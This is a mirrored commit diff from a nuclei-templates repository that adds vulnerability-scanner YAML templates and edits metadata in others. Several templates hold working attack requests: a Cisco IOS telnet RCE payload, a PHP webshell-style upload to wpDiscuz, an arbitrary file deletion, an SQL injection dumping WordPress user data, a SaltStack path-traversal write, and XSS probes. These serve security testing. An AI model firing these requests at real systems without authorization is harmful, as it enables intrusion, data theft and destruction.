daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'master' of https://github.com/meme-lord/nuclei-templates into pr/1071

patch-1
sandeep 2021-03-17 17:12:34 +05:30
parent 9b23d05693 5a43a7e021
commit e01c3942bc
100 changed files with 868 additions and 118 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

8
README.md
View File

@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc
| Templates | Counts | Templates | Counts | Templates | Counts |
| -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ |
| cves | 237 | vulnerabilities | 106 | exposed-panels | 104 |
| exposures | 63 | technologies | 50 | misconfiguration | 54 |
| workflows | 23 | miscellaneous | 16 | default-logins | 19 |
| cves | 245 | vulnerabilities | 111 | exposed-panels | 107 |
| exposures | 63 | technologies | 52 | misconfiguration | 54 |
| workflows | 24 | miscellaneous | 16 | default-logins | 19 |
| exposed-tokens | 9 | dns | 6 | fuzzing | 4 |
| helpers | 2 | takeovers | 1 | - | - |
**75 directories, 717 files**.
**76 directories, 738 files**.
</td>
</tr>

26
cves/2017/CVE-2017-3881.yaml Normal file
View File

@ -0,0 +1,26 @@
id: CVE-2017-3881
info:
name: Cisco IOS 12.2(55)SE11 Remote Code Execution
author: dwisiswant0
severity: critical
reference: |
- https://github.com/artkond/cisco-rce
- https://artkond.com/2017/04/10/cisco-catalyst-remote-code-execution/
- https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/auxiliary/dos/cisco/ios_telnet_rocem.md
description: RCE exploit code is available for Cisco Catalyst 2960 switch model. This exploit is firmware dependent.
tags: cve,cve2017,cisco,rce,network
network:
- inputs:
- data: "{{hex_decode('fffa240003')}}CISCO_KITS{{hex_decode('01')}}2:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA{{hex_decode('000037b4023d55dc0000999c')}}BBBB{{hex_decode('00e1a9f4')}}CCCCDDDDEEEE{{hex_decode('00067b5c023d55c8')}}FFFFGGGG{{hex_decode('006cb3a000270b94')}}HHHHIIII{{hex_decode('014acf98')}}JJJJKKKKLLLL{{hex_decode('0114e7ec')}}:15:{{hex_decode('fff0')}}"
read: 1024
- data: "show priv"
read: 1024
host:
- "{{Hostname}}:23"
read-size: 1024
matchers:
- type: word
words:
- "Current privilege level is"

26
cves/2018/CVE-2018-1207.yaml Normal file
View File

@ -0,0 +1,26 @@
id: CVE-2018-1207
info:
name: Dell iDRAC7 and iDRAC8 Devices Code Injection/RCE
author: dwisiswant0
severity: critical
reference: https://downloads.dell.com/solutions/dell-management-solution-resources/iDRAC_CVE%201207_1211_1000116.pdf
description: |
This template supports the detection part only.
Dell EMC iDRAC7/iDRAC8, versions prior to 2.52.52.52, contain CGI injection vulnerability
which could be used to execute remote code. A remote unauthenticated attacker may
potentially be able to use CGI variables to execute remote code.
https://github.com/KraudSecurity/Exploits/blob/master/CVE-2018-1207/CVE-2018-1207.py
tags: cve,cve2018,dell,injection,rce
requests:
- method: GET
path:
- "{{BaseURL}}/cgi-bin/login?LD_DEBUG=files"
matchers:
- type: word
words:
- "calling init: /lib/"
part: all

37
cves/2018/CVE-2018-3810.yaml Normal file
View File

@ -0,0 +1,37 @@
id: CVE-2018-3810
info:
name: WordPress Smart Google Code Inserter Authentication Bypass
author: princechaddha
severity: critical
reference: https://www.exploit-db.com/exploits/43420
tags: wordpress,auth-bypass,cve,cve2018
requests:
- method: POST
path:
- "{{BaseURL}}/wp-admin/options-general.php?page=smartcode"
body: 'sgcgoogleanalytic=<script>console.log("Nuclei - Open-source project [github.com/projectdiscovery/nuclei]")</script>&sgcwebtools=&button=Save+Changes&action=savegooglecode'
headers:
Content-Type: application/x-www-form-urlencoded
- method: GET
path:
- "{{BaseURL}}/"
matchers-condition: and
matchers:
- type: word
words:
- "text/html"
part: header
- type: word
words:
- '<script>console.log("Nuclei - Open-source project [github.com/projectdiscovery/nuclei]")</script>'
part: body
- type: status
status:
- 200

28
cves/2018/CVE-2018-6910.yaml Normal file
View File

@ -0,0 +1,28 @@
id: CVE-2018-6910
info:
name: DedeCMS 5.7 path disclosure
author: pikpikcu
severity: medium
reference: https://nvd.nist.gov/vuln/detail/CVE-2018-6910
description: DedeCMS 5.7 allows remote attackers to discover the full path via a direct request for include/downmix.inc.php or inc/inc_archives_functions.php
tags: cve,cve2018,dedecms
requests:
- method: GET
path:
- "{{BaseURL}}/include/downmix.inc.php"
matchers-condition: and
matchers:
- type: word
words:
- "downmix.inc.php"
- "Call to undefined function helper()"
part: body
condition: and
- type: status
status:
- 200

27
cves/2018/CVE-2018-7700.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2018-7700
info:
name: DedeCMS V5.7SP2 RCE
author: pikpikcu
severity: high
reference: https://laworigin.github.io/2018/03/07/CVE-2018-7700-dedecms%E5%90%8E%E5%8F%B0%E4%BB%BB%E6%84%8F%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C/
tags: cve,cve2018,dedecms,rce
requests:
- method: GET
path:
- "{{BaseURL}}/tag_test_action.php?url=a&token=&partcode={dede:field%20name=%27source%27%20runphp=%27yes%27}phpinfo();{/dede:field}"
matchers-condition: and
matchers:
- type: word
words:
- "phpinfo"
- "PHP Version"
part: body
condition: and
- type: status
status:
- 200

2
cves/2019/CVE-2019-0221.yaml
View File

@ -4,7 +4,7 @@ info:
name: Apache Tomcat XSS
author: pikpikcu
severity: low
reference:
reference: |
- https://seclists.org/fulldisclosure/2019/May/50
- https://wwws.nightwatchcybersecurity.com/2019/05/27/xss-in-ssi-printenv-command-apache-tomcat-cve-2019-0221/
description: |

2
cves/2019/CVE-2019-1653.yaml
View File

@ -6,7 +6,7 @@ info:
severity: high
tags: cve,cve2019,cisco
description: A vulnerability in the web-based management interface of Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN Routers could allow an unauthenticated, remote attacker to retrieve sensitive information. The vulnerability is due to improper access controls for URLs. An attacker could exploit this vulnerability by connecting to an affected device via HTTP or HTTPS and requesting specific URLs. A successful exploit could allow the attacker to download the router configuration or detailed diagnostic information. Cisco has released firmware updates that address this vulnerability.
reference:
reference: |
- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-info
- https://www.exploit-db.com/exploits/46262/
- https://www.exploit-db.com/exploits/46655/

2
cves/2020/CVE-2020-1147.yaml
View File

@ -6,7 +6,7 @@ info:
description: A remote code execution vulnerability exists in .NET Framework, Microsoft SharePoint, and Visual Studio when the software fails to check the source markup of XML file input, aka '.NET Framework, SharePoint Server, and Visual Studio Remote Code Execution Vulnerability'.
severity: critical
tags: cve,cve2020,sharepoint,iis,rce
reference:
reference: |
- https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1147
- https://srcincite.io/blog/2020/07/20/sharepoint-and-pwn-remote-code-execution-against-sharepoint-server-abusing-dataset.html

30
cves/2020/CVE-2020-12256.yaml
View File

@ -1,30 +0,0 @@
id: CVE-2020-12256
info:
name: rConfig 3.9.4 XSS
author: pikpikcu
severity: medium
reference: https://nvd.nist.gov/vuln/detail/CVE-2020-12256
tags: cve,cve2020,rconfig,xss
requests:
- method: GET
path:
- '{{BaseURL}}/devicemgmt.php?deviceId=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(document.cookie)</script>"
part: body
- type: status
status:
- 200
- type: word
part: header
words:
- "text/html"

30
cves/2020/CVE-2020-12259.yaml
View File

@ -1,30 +0,0 @@
id: CVE-2020-12259
info:
name: rConfig 3.9.4 XSS
author: pikpikcu
severity: medium
reference: https://nvd.nist.gov/vuln/detail/CVE-2020-12259
tags: cve,cve2020,rconfig,xss
requests:
- method: GET
path:
- '{{BaseURL}}/configDevice.php?rid=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(document.cookie)</script>"
part: body
- type: status
status:
- 200
- type: word
part: header
words:
- "text/html"

2
cves/2020/CVE-2020-13167.yaml
View File

@ -6,7 +6,7 @@ info:
severity: critical
description: Netsweeper through 6.4.3 allows unauthenticated remote code execution because webadmin/tools/unixlogin.php (with certain Referer headers) launches a command line with client-supplied parameters, and allows injection of shell metacharacters.
tags: cve,cve2020,netsweeper,rce
reference:
reference: |
- https://ssd-disclosure.com/ssd-advisory-netsweeper-preauth-rce/
- https://portswigger.net/daily-swig/severe-rce-vulnerability-in-content-filtering-system-has-been-patched-netsweeper-says

2
cves/2020/CVE-2020-13937.yaml
View File

@ -11,7 +11,7 @@ info:
3.0.2, 3.1.0, 4.0.0-alpha has one restful api which exposed
Kylin's configuration information without any authentication,
so it is dangerous because some confidential information entries will be disclosed to everyone.
reference:
reference: |
- https://kylin.apache.org/docs/release_notes.html
- https://s.tencent.com/research/bsafe/1156.html
tags: cve,cve2020,apache

2
cves/2020/CVE-2020-13942.yaml
View File

@ -11,7 +11,7 @@ info:
that could execute code with the permission level of the running Java process.
This vulnerability affects all versions of Apache Unomi prior to 1.5.2. Apache Unomi users should upgrade to 1.5.2 or later.
reference:
reference: |
- https://securityboulevard.com/2020/11/apache-unomi-cve-2020-13942-rce-vulnerabilities-discovered/
- https://twitter.com/chybeta/status/1328912309440311297
tags: cve,cve2020,apache,rce

32
cves/2020/CVE-2020-14092.yaml Normal file
View File

@ -0,0 +1,32 @@
id: CVE-2020-14092
info:
name: WordPress Payment Form For Paypal Pro Unauthenticated SQL Injection
author: princechaddha
severity: critical
reference: https://wpscan.com/vulnerability/10287
tags: cve,cve2020,wordpress,wp-plugin,sqli
requests:
- method: GET
path:
- "{{BaseURL}}/?cffaction=get_data_from_database&query=SELECT%20*%20from%20wp_users"
matchers-condition: and
matchers:
- type: word
words:
- "text/html"
part: header
- type: word
words:
- '"user_login"'
- '"user_email"'
- '"user_pass"'
- '"user_activation_key"'
condition: and
part: body
- type: status
status:
- 200

2
cves/2020/CVE-2020-14864.yaml
View File

@ -6,7 +6,7 @@ info:
cvss: 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'
severity: high
tags: cve,cve2020,oracle,traversal
reference:
reference: |
- http://packetstormsecurity.com/files/159748/Oracle-Business-Intelligence-Enterprise-Edition-5.5.0.0.0-12.2.1.3.0-12.2.1.4.0-LFI.html
- https://www.oracle.com/security-alerts/cpuoct2020.html

2
cves/2020/CVE-2020-14882.yaml
View File

@ -4,7 +4,7 @@ info:
name: Oracle WebLogic Server Unauthenticated RCE (and Patch Bypass)
author: dwisiswant0
severity: critical
reference:
reference: |
- https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf
- https://twitter.com/jas502n/status/1321416053050667009
- https://youtu.be/JFVDOIL0YtA

2
cves/2020/CVE-2020-15505.yaml
View File

@ -6,7 +6,7 @@ info:
severity: critical
description: |
A remote code execution vulnerability in MobileIron Core & Connector versions 10.3.0.3 and earlier, 10.4.0.0, 10.4.0.1, 10.4.0.2, 10.4.0.3, 10.5.1.0, 10.5.2.0 and 10.6.0.0; and Sentry versions 9.7.2 and earlier, and 9.8.0; and Monitor and Reporting Database (RDB) version 2.0.0.1 and earlier that allows remote attackers to execute arbitrary code via unspecified vectors.
reference:
reference: |
- https://blog.orange.tw/2020/09/how-i-hacked-facebook-again-mobileiron-mdm-rce.html
- https://github.com/iamnoooob/CVE-Reverse/tree/master/CVE-2020-15505
- https://github.com/iamnoooob/CVE-Reverse/blob/master/CVE-2020-15505/hessian.py#L10

2
cves/2020/CVE-2020-16846.yaml
View File

@ -9,7 +9,7 @@ info:
with the SSH client enabled, can result in shell injection.
This template supports the detection part only. See references.
reference:
reference: |
- https://mp.weixin.qq.com/s/R8qw_lWizGyeJS0jOcYXag
- https://github.com/vulhub/vulhub/tree/master/saltstack/CVE-2020-16846
tags: cve,cve2020,saltstack

2
cves/2020/CVE-2020-16952.yaml
View File

@ -5,7 +5,7 @@ info:
author: dwisiswant0
severity: critical
description: A remote code execution vulnerability exists in Microsoft SharePoint when the software fails to check the source markup of an application package, aka 'Microsoft SharePoint Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-16951.
reference:
reference: |
- https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16952
- https://srcincite.io/pocs/cve-2020-16952.py.txt
- https://github.com/rapid7/metasploit-framework/blob/1a341ae93191ac5f6d8a9603aebb6b3a1f65f107/documentation/modules/exploit/windows/http/sharepoint_ssi_viewstate.md

2
cves/2020/CVE-2020-17530.yaml
View File

@ -4,7 +4,7 @@ info:
name: Apache Struts RCE
author: pikpikcu
severity: critical
reference:
reference: |
- http://packetstormsecurity.com/files/160721/Apache-Struts-2-Forced-Multi-OGNL-Evaluation.html
- http://jvn.jp/en/jp/JVN43969166/index.html
- https://cwiki.apache.org/confluence/display/WW/S2-061

2
cves/2020/CVE-2020-2096.yaml
View File

@ -5,7 +5,7 @@ info:
author: madrobot
severity: medium
description: Jenkins Gitlab Hook Plugin 1.4.2 and earlier does not escape project names in the build_now endpoint, resulting in a reflected XSS vulnerability.
reference:
reference: |
- https://jenkins.io/security/advisory/2020-01-15/#SECURITY-1683
- http://www.openwall.com/lists/oss-security/2020/01/15/1
- http://packetstormsecurity.com/files/155967/Jenkins-Gitlab-Hook-1.4.2-Cross-Site-Scripting.html

89
cves/2020/CVE-2020-24186.yaml Normal file
View File

@ -0,0 +1,89 @@
id: CVE-2020-24186
info:
name: Unauthenticated File upload wpDiscuz WordPress plugin RCE
author: Ganofins
severity: critical
description: WordPress wpDiscuz plugin version 7.0.4. This flaw gave unauthenticated attackers the ability to upload arbitrary files, including PHP files, and achieve remote code execution on a vulnerable sites server.
reference: https://github.com/suncsr/wpDiscuz_unauthenticated_arbitrary_file_upload/blob/main/README.md
tags: cve,cve2020,wordpress,wp-plugin,rce
requests:
- raw:
- |
GET /?p=1 HTTP/1.1
Host: {{Hostname}}
Accept: */*
Connection: close
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Length: 745
Accept: */*
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary88AhjLimsDMHU1Ak
Origin: {{BaseURL}}
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: {{BaseURL}}
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Connection: close
------WebKitFormBoundary88AhjLimsDMHU1Ak
Content-Disposition: form-data; name="action"
wmuUploadFiles
------WebKitFormBoundary88AhjLimsDMHU1Ak
Content-Disposition: form-data; name="wmu_nonce"
{{wmuSecurity}}
------WebKitFormBoundary88AhjLimsDMHU1Ak
Content-Disposition: form-data; name="wmuAttachmentsData"
undefined
------WebKitFormBoundary88AhjLimsDMHU1Ak
Content-Disposition: form-data; name="wmu_files[0]"; filename="rce.php"
Content-Type: image/png
{{base64_decode('/9j/4WpFeGlmTU0q/f39af39Pv39/f39/f39/f2o/f39/cD9/f39/f39/f39/f/g/UpGSUb9/f39/9tD/f0M/QwK/f0=')}}
<?php phpinfo();?>
------WebKitFormBoundary88AhjLimsDMHU1Ak
Content-Disposition: form-data; name="postId"
1
------WebKitFormBoundary88AhjLimsDMHU1Ak--
extractors:
- type: regex
part: body
internal: true
name: wmuSecurity
group: 1
regex:
- 'wmuSecurity":"([a-z0-9]+)'
- type: regex
part: body
group: 1
regex:
- '"url":"([a-z:\\/0-9-.]+)"'
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- 'success":true'
- 'fullname'
- 'shortname'
- 'url'
condition: and
part: body

2
cves/2020/CVE-2020-25213.yaml
View File

@ -5,7 +5,7 @@ info:
author: foulenzer
severity: critical
description: The vulnerability allows unauthenticated remote attackers to upload .php files. This templates only detects the plugin, not its vulnerability.
reference:
reference: |
- https://plugins.trac.wordpress.org/changeset/2373068
- https://github.com/w4fz5uck5/wp-file-manager-0day
tags: cve,cve2020,wordpress,rce

2
cves/2020/CVE-2020-26214.yaml
View File

@ -5,7 +5,7 @@ info:
author: CasperGN
severity: critical
description: Alerta prior to version 8.1.0 is prone to Authentication Bypass when using LDAP as authorization provider and the LDAP server accepts Unauthenticated Bind reqests.
reference:
reference: |
- https://github.com/advisories/GHSA-5hmm-x8q8-w5jh
- https://tools.ietf.org/html/rfc4513#section-5.1.2
- https://pypi.org/project/alerta-server/8.1.0/

79
cves/2020/CVE-2020-35951.yaml Normal file
View File

@ -0,0 +1,79 @@
id: CVE-2020-35951
info:
name: Wordpress Quiz and Survey Master Arbitrary File Deletion
author: princechaddha
severity: critical
reference: https://www.wordfence.com/blog/2020/08/critical-vulnerabilities-patched-in-quiz-and-survey-master-plugin/
tags: cve,cve2020,wordpress,wp-plugin
requests:
- raw:
- |
GET /wp-content/plugins/quiz-master-next/README.md HTTP/1.1
Host: {{Hostname}}
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
Connection: close
- |
GET /wp-content/plugins/quiz-master-next/tests/_support/AcceptanceTester.php HTTP/1.1
Host: {{Hostname}}
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
Connection: close
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Length: 269
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_2_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.192 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBJ17hSJBjuGrnW92
Accept: */*
Accept-Language: en-US,en;q=0.9
Connection: close
------WebKitFormBoundaryBJ17hSJBjuGrnW92
Content-Disposition: form-data; name="action"
qsm_remove_file_fd_question
------WebKitFormBoundaryBJ17hSJBjuGrnW92
Content-Disposition: form-data; name="file_url"
{{fullpath}}wp-content/plugins/quiz-master-next/README.md
------WebKitFormBoundaryBJ17hSJBjuGrnW92--
- |
GET /wp-content/plugins/quiz-master-next/README.md HTTP/1.1
Host: {{Hostname}}
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
Connection: close
extractors:
- type: regex
name: fullpath
internal: true
part: body
group: 1
regex:
- "not found in <b>([/a-z_]+)wp"
req-condition: true
matchers-condition: or
matchers:
- type: word
words:
- '{"type":"success","message":"File removed successfully"}'
part: body
- type: dsl
dsl:
- "contains((body_1), '# Quiz And Survey Master') && status_code_4==301 && !contains((body_4), '# Quiz And Survey Master')"

40
cves/2021/CVE-2021-25281.yaml Normal file
View File

@ -0,0 +1,40 @@
id: CVE-2021-25281
info:
name: CVE-2021-25281 - SaltStack wheel_async unauth access
author: madrobot
severity: critical
reference: http://hackdig.com/02/hack-283902.htm
description: The SaltAPI does not honor eauth credentials for the wheel_async client. Thus, an attacker can remotely run any wheel modules on the master.
tags: cve,cve2021,saltapi,rce,saltstack
requests:
- raw:
- |
POST /run HTTP/1.1
Host: {{Hostname}}
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Content-Type: application/json
Content-Length: 173
Connection: close
{"client":"wheel_async","fun":"pillar_roots.write","data":"testing","path":"../../../../../../../tmp/testing","username":"1","password":"1","eauth":"pam"}
matchers-condition: and
matchers:
- type: word
words:
- "return"
- "tag"
- "jid"
- "salt"
- "wheel"
part: body
condition: and
- type: status
status:
- 200

22
exposed-panels/cisco-finesse-login.yaml Normal file
View File

@ -0,0 +1,22 @@
id: cisco-finesse-login
info:
name: Cisco Finesse Login
author: dhiyaneshDK
severity: info
reference: https://www.exploit-db.com/ghdb/6824
tags: cisco
requests:
- method: GET
path:
- '{{BaseURL}}/desktop/container/landing.jsp?locale=en_US'
matchers-condition: and
matchers:
- type: word
words:
- '<title id="page_title">Sign in to Cisco Finesse</title>'
- type: status
status:
- 200

22
exposed-panels/mini-start-page.yaml Normal file
View File

@ -0,0 +1,22 @@
id: mini-start-page
info:
name: Miniweb Start Page
author: dhiyaneshDk
severity: info
reference: https://www.exploit-db.com/ghdb/6500
requests:
- method: GET
path:
- "{{BaseURL}}/start.html"
- "{{BaseURL}}/www/start.html"
matchers-condition: and
matchers:
- type: word
words:
- '<title>Miniweb Start Page</title>'
part: body
- type: status
status:
- 200

21
exposed-panels/tuxedo-connected-controller.yaml Normal file
View File

@ -0,0 +1,21 @@
id: tuxedo-connected-controller
info:
name: Tuxedo Connected Controller
author: dhiyaneshDk
severity: info
reference: https://www.exploit-db.com/ghdb/6486
requests:
- method: GET
path:
- "{{BaseURL}}/login.html"
matchers-condition: and
matchers:
- type: word
words:
- '<title>Tuxedo Connected Controller</title>'
part: body
- type: status
status:
- 200

5
exposed-panels/workspace-one-uem.yaml
View File

@ -1,13 +1,10 @@
id: workspace-one-uem
# Reference:
# https://twitter.com/Jhaddix/status/1295861505963909120
info:
name: Workspace ONE UEM AirWatch Login Page
author: gevakun
severity: info
reference: https://twitter.com/Jhaddix/status/1295861505963909120
requests:
- method: GET
path:

5
exposures/files/domcfg-page.yaml
View File

@ -3,10 +3,7 @@ info:
name: Lotus Domino Configuration Page
author: gevakun
severity: low
# Reference:
# https://twitter.com/Wh11teW0lf/status/1295594085445709824
# Do not test any website without permission
reference: https://twitter.com/Wh11teW0lf/status/1295594085445709824
requests:
- method: GET

2
fuzzing/adminer-panel-fuzz.yaml
View File

@ -43,4 +43,4 @@ requests:
part: body
group: 1
regex:
- '<span class="version">([0-9.]+)'
- '<span class="version">([0-9.]+)'

1
misconfiguration/aem-groovyconsole.yaml
View File

@ -6,6 +6,7 @@ info:
severity: critical
description: Groovy console is exposed, RCE is possible.
reference: https://hackerone.com/reports/672243
tags: aem
requests:
- method: GET

1
misconfiguration/airflow-api-exposure.yaml
View File

@ -4,6 +4,7 @@ info:
name: Apache Airflow API Exposure / Unauthenticated Access
author: pd-team
severity: medium
tags: apache,airflow,unauth
requests:
- method: GET

1
misconfiguration/apache-tomcat-snoop.yaml
View File

@ -6,6 +6,7 @@ info:
severity: low
description: The following example scripts that come with Apache Tomcat v4.x - v7.x and can be used by attackers to gain information about the system. These scripts are also known to be vulnerable to cross site scripting (XSS) injection.
reference: https://www.rapid7.com/db/vulnerabilities/apache-tomcat-example-leaks
tags: apache
requests:
- method: GET

1
misconfiguration/apc-info.yaml
View File

@ -4,6 +4,7 @@ info:
name: APCu service information leakage
author: koti2
severity: low
tags: config
requests:
- method: GET

1
misconfiguration/aspx-debug-mode.yaml
View File

@ -5,6 +5,7 @@ info:
author: dhiyaneshDk
severity: info
reference: https://portswigger.net/kb/issues/00100800_asp-net-debugging-enabled
tags: debug
requests:
- raw:

1
misconfiguration/aws-redirect.yaml
View File

@ -5,6 +5,7 @@ info:
author: manikanta a.k.a @secureitmania
severity: info
reference: https://link.medium.com/fgXKJHR9P7
tags: aws
requests:
- method: GET

1
misconfiguration/cgi-test-page.yaml
View File

@ -3,6 +3,7 @@ info:
name: CGI Test page
author: YASH ANAND @yashanand155
severity: info
tags: cgi
requests:
- method: GET

1
misconfiguration/d-link-arbitary-fileread.yaml
View File

@ -5,6 +5,7 @@ info:
author: dhiyaneshDK
severity: high
reference: https://suid.ch/research/DAP-2020_Preauth_RCE_Chain.html
tags: dlink,lfi
requests:
- method: POST

1
misconfiguration/django-debug-detect.yaml
View File

@ -4,6 +4,7 @@ info:
name: Django Debug Method Enabled
author: dhiyaneshDK
severity: medium
tags: django,debug
requests:
- method: GET

1
misconfiguration/docker-registry.yaml
View File

@ -4,6 +4,7 @@ info:
name: Docker Registry Listing
author: puzzlepeaches
severity: medium
tags: docker
requests:
- method: GET

1
misconfiguration/druid-monitor.yaml
View File

@ -3,6 +3,7 @@ info:
name: Druid Monitor Unauthorized Access
author: 0h1in9e @ohlinge
severity: high
tags: druid,unauth
requests:
- method: GET

1
misconfiguration/drupal-user-enum-ajax.yaml
View File

@ -4,6 +4,7 @@ info:
name: Drupal User Enumration [Ajax]
author: 0w4ys
severity: info
tags: drupal
requests:
- method: GET

1
misconfiguration/drupal-user-enum-redirect.yaml
View File

@ -4,6 +4,7 @@ info:
name: Drupal User Enumration [Redirect]
author: 0w4ys
severity: info
tags: drupal
requests:
- method: GET

1
misconfiguration/elasticsearch.yaml
View File

@ -4,6 +4,7 @@ info:
name: ElasticSearch Information Disclosure
author: Shine
severity: low
tags: es,unauth
requests:
- method: GET

1
misconfiguration/exposed-docker-api.yaml
View File

@ -4,6 +4,7 @@ info:
name: Exposed Docker API
author: furkansenan & dwisiswant0
severity: info
tags: docker,unauth
requests:
- method: GET

1
misconfiguration/exposed-kibana.yaml
View File

@ -4,6 +4,7 @@ info:
name: Exposed Kibana
author: Shine
severity: medium
tags: kibana,unauth
requests:
- method: GET

9
misconfiguration/exposed-service-now.yaml
View File

@ -5,11 +5,10 @@ info:
author: dhiyaneshDK
severity: info
description: detectes misconfigured Service-now ITSM instances
reference: https://medium.com/@th3g3nt3l/multiple-information-exposed-due-to-misconfigured-service-now-itsm-instances-de7a303ebd56
# Thanks to Th3G3nt3lman for the writeup
# https://medium.com/@th3g3nt3l/multiple-information-exposed-due-to-misconfigured-service-now-itsm-instances-de7a303ebd56
# Exploitation :- https://github.com/leo-hildegarde/SnowDownKB/
reference: |
- https://medium.com/@th3g3nt3l/multiple-information-exposed-due-to-misconfigured-service-now-itsm-instances-de7a303ebd56
- https://github.com/leo-hildegarde/SnowDownKB/
tags: servicenow
requests:
- method: GET

3
misconfiguration/front-page-misconfig.yaml
View File

@ -4,8 +4,7 @@ info:
name: FrontPage configuration information discloure
author: JTeles & pikpikcu
severity: info
# Reference: https://docs.microsoft.com/en-us/archive/blogs/fabdulwahab/security-protecting-sharepoint-server-applications
reference: https://docs.microsoft.com/en-us/archive/blogs/fabdulwahab/security-protecting-sharepoint-server-applications
requests:
- method: GET

29
misconfiguration/gitlab/gitlab-public-repos.yaml Normal file
View File

@ -0,0 +1,29 @@
id: gitlab-public-repos
info:
name: GitLab public repositories
author: ldionmarcil
severity: info
tags: gitlab
reference: |
- https://twitter.com/ldionmarcil/status/1370052344562470922
- https://github.com/ldionmarcil/gitlab-unauth-parser
requests:
- method: GET
path:
- "{{BaseURL}}/api/v4/projects"
headers:
Cookie: _gitlab_session=
matchers-condition: and
matchers:
- type: word
part: header
words:
- "Set-Cookie: _gitlab_session="
- type: word
part: body
words:
- "name_with_namespace"

8
misconfiguration/gitlab-snippets.yaml → misconfiguration/gitlab/gitlab-snippets.yaml
View File

@ -3,6 +3,7 @@ info:
name: GitLab public snippets
author: pdteam
severity: info
tags: gitlab
reference: https://gist.github.com/vysecurity/20311c29d879e0aba9dcffbe72a88b10
requests:
@ -18,4 +19,9 @@ requests:
- type: status
status:
- 200
- 200
- type: word
words:
- "No snippets found"
negative: true
part: body

1
misconfiguration/hadoop-unauth.yaml
View File

@ -4,6 +4,7 @@ info:
name: Apache Hadoop Unauth
author: pdteam
severity: low
tags: apache,hadoop,unauth
requests:
- method: GET

2
misconfiguration/haproxy-status.yaml
View File

@ -5,7 +5,7 @@ info:
author: dhiyaneshDK
severity: medium
reference: https://www.exploit-db.com/ghdb/4191
tags: logs
tags: logs,haproxy
requests:
- method: GET

2
misconfiguration/horde-unauthenticated.yaml
View File

@ -4,7 +4,7 @@ info:
name: Horde Groupware Unauthenticated
author: pikpikcu
severity: critical
tags: horde
tags: horde,unauth
requests:
- method: GET

1
misconfiguration/http-etcd-unauthenticated-api-data-leak.yaml
View File

@ -5,6 +5,7 @@ info:
author: dhiyaneshDk
severity: high
reference: https://hackerone.com/reports/1088429
tags: unauth
requests:
- method: GET

1
misconfiguration/java-melody-exposed.yaml
View File

@ -4,6 +4,7 @@ info:
name: JavaMelody Monitoring Exposed
author: dhiyaneshDK
severity: medium
tags: config
requests:
- method: GET

1
misconfiguration/jboss-status.yaml
View File

@ -5,6 +5,7 @@ info:
author: dhiyaneshDK
severity: low
reference: https://www.exploit-db.com/ghdb/5215
tags: jboss,unauth
requests:
- method: GET

1
misconfiguration/jkstatus-manager.yaml
View File

@ -4,6 +4,7 @@ info:
name: JK Status Manager
author: pd-team
severity: low
tags: config
requests:
- method: GET

1
misconfiguration/jupyter-ipython-unauth.yaml
View File

@ -5,6 +5,7 @@ info:
author: pentest_swissky
severity: critical
description: Unauthenticated access to Jupyter instance
tags: unauth
requests:
- method: GET

1
misconfiguration/kubernetes-pods.yaml
View File

@ -6,6 +6,7 @@ info:
severity: critical
description: When the service port is available, anyone can execute commands inside the container. See https://github.com/officialhocc/Kubernetes-Kubelet-RCE for inspiration.
reference: https://blog.binaryedge.io/2018/12/06/kubernetes-being-hijacked-worldwide/
tags: k8,unauth
requests:
- method: GET

3
misconfiguration/larvel-debug.yaml → misconfiguration/laravel-debug.yaml
View File

